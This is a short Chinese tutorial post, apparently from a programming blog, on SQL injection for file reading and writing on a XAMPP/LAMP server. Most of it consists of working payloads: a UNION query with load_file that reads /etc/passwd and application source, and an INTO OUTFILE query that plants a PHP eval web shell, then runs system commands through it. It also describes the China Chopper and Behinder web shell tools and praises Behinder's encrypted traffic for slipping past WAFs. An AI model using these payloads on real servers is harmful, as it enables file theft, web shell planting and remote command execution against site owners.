3.SQL注入-查询漏洞二
2022/8/1 2:23:24
本文主要是介绍3.SQL注入-查询漏洞二,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
一.不要开启phpmyadmin
1.配置文件 /opt/lampp/etc/extra/httpd-xampp.conf
2.修改phpmyadmin目录名称为不容易猜测的
二.SQL注入-文件读写以及木马植入
1.读写权限确认
secure_file_priv = 空的时候,任意读写 secure_file_priv = 某个路径的时候,只能在那个路径下读写 secure_file_priv = NULL,不能读写
#利用SQL语句读取系统文件 -1 union select 1,2,3,load_file("/etc/passwd"),5 select load_file("/opt/lampp/htdocs/security/common.php") #利用SQL语句写入系统文件 select "hello world" into outfile "/opt/lampp/htdocs/security/muma.php" -1 union select 1,2,3,"<?php @eval($_GET['a']);?>",5 into outfile "/opt/lampp/htdocs/security/muma.php" #访问muma.php执行指令 muma.php?a=system("ifconfig");
三.中国菜刀
1.提前上传了木马
2.请求必须为POST类型,参数自定义
3.传输过程为明文传输,目前已经被WAF给拦截了
四.Behinder冰蝎
1.冰蝎是加密传输,防火墙很难分析出流量特征,比较容易绕开WAF
需要先上传一个冰蝎自己带加密解密功能的web shell
a=system("echo "<?php" >> /opt/lampp/htdocs/security/muma.php");
这篇关于3.SQL注入-查询漏洞二的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-05-13TiDB + ES:转转业财系统亿级数据存储优化实践
- 2024-05-09“2024鸿蒙零基础快速实战-仿抖音App开发(ArkTS版)”实战课程已上线
- 2024-05-09聊聊如何通过arthas-tunnel-server来远程管理所有需要arthas监控的应用
- 2024-05-09log4j2这么配就对了
- 2024-05-09nginx修改Content-Type
- 2024-05-09Redis多数据源,看这篇就够了
- 2024-05-09Google Chrome驱动程序 124.0.6367.62(正式版本)去哪下载?
- 2024-05-09有没有大佬知道这种数据应该怎么抓取呀?
- 2024-05-09这种运行结果里的10.100000001,怎么能最快改成10.1?
- 2024-05-09企业src漏洞挖掘-有意思的命令执行